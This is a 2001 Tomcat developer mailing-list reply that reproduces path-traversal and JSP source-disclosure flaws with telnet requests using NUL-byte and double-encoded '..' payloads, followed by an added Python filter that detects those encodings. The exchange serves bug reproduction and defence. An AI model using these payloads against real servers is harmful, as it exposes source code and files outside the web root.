On Wed, Apr 04, 2001 at 08:35:11AM -0500, Marc Saegesser wrote:
> Has anyone on tomcat-dev been able to reproduce these problems using Tomcat
> 3.2.x? I've been trying to reproduce the error using 3.2.1, 3.2.2b2 and
> even 3.1.1. So far I always get a 404. I've never been able to get
> directory listing or JSP source.
[...]
> > > exploits:
> > > http://target:8080/%2e%2e/%2e%2e/%00.jsp
> > > It is possible to cause the Tomcat server to list
> > > outside the document root directory scope.

I can't reproduce that one, but could verify the following problems
on Linux:

$ telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Tue, 03 Apr 2001 14:49:28 GMT
Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /examples/jsp/num/numguess.jsp%00
HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 1237
Last-Modified: Wed, 04 Apr 2001 10:37:30 GMT
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[numguess.jsp source follows]

$ telnet localhost 8180
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /%252e%252e/%252e%252e/%00.jsp
HTTP/1.0 200 OK
Content-Type: text/html;charset=ISO-8859-1
Servlet-Engine: Tomcat Web Server/3.2.2 beta 2 (JSP 1.1; Servlet 2.2;
Java 1.3.0; Linux 2.4.2 i386; java.vendor=Caldera Systems Inc.)
[directory listing follows]

--
Stephan Seyboth - Developer
Caldera (Deutschland) GmbH
http://www.caldera.de/
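
The encoded request paths quoted in this thread, run through a request-path check that percent-decodes repeatedly and flags NUL bytes, repeated encoding and ".." segments. This is an added example, not part of the original post and not Tomcat's code; the function name, the reason labels, the decode cap and the /index.html sample are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 4  # assumption: cap on repeated percent-decoding


def rejection_reasons(raw_path):
    """Return the reasons to reject a raw request path; an empty list means clean."""
    # Keep every decoding stage so a NUL that appears after one round
    # is still seen even if a later round changes the bytes around it.
    stages = [raw_path.encode("utf-8")]
    for _ in range(MAX_ROUNDS):
        decoded = unquote_to_bytes(stages[-1])
        if decoded == stages[-1]:
            break  # nothing left to decode
        stages.append(decoded)

    reasons = []
    # More than one productive round means the path was encoded at least
    # twice (%252e -> %2e -> "."), which a single-decode check would miss.
    if len(stages) > 2:
        reasons.append("multiple-encoding")
    # A NUL byte can truncate the name seen by native file APIs
    # while extension matching still sees ".jsp".
    if any(b"\x00" in stage for stage in stages):
        reasons.append("nul-byte")
    # Look for ".." segments only in the fully decoded form,
    # treating backslash as a separator as well.
    segments = stages[-1].replace(b"\\", b"/").split(b"/")
    if b".." in segments:
        reasons.append("dot-dot-segment")
    return reasons


# Paths taken from the requests in this thread, plus one constructed clean path.
SAMPLE_PATHS = [
    "/%2e%2e/%2e%2e/%00.jsp",
    "/examples/jsp/num/numguess.jsp%00",
    "/%252e%252e/%252e%252e/%00.jsp",
    "/index.html",  # constructed sample, not from the thread
]

if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        print(path, "->", rejection_reasons(path) or "ok")
```

The check works on the raw path as received, before any container decoding, so it sees the same bytes that appear on the GET lines above.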